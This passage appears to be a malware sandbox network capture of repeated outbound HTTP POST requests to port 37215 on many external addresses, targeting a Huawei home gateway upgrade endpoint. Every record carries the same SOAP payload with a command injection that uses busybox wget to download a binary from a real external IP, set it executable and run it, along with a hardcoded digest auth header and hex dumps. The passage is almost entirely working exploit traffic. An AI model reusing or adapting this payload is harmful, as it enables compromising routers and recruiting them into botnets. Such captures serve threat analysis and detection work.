                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              292192.168.2.153590237.200.75.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206516027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              293192.168.2.1534708138.252.199.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206556082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              294192.168.2.1542636222.96.101.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206567049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              295192.168.2.1560370156.183.29.4837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206598043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              296192.168.2.1554614122.109.233.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206607103 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              297192.168.2.1543626197.35.14.24837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206680059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              298192.168.2.155029437.65.6.21937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206693888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              299192.168.2.155571645.109.252.12637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206701040 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              300192.168.2.154655694.162.183.9437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206701040 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              301192.168.2.1552422138.198.245.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206742048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              302192.168.2.155173831.80.245.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206744909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
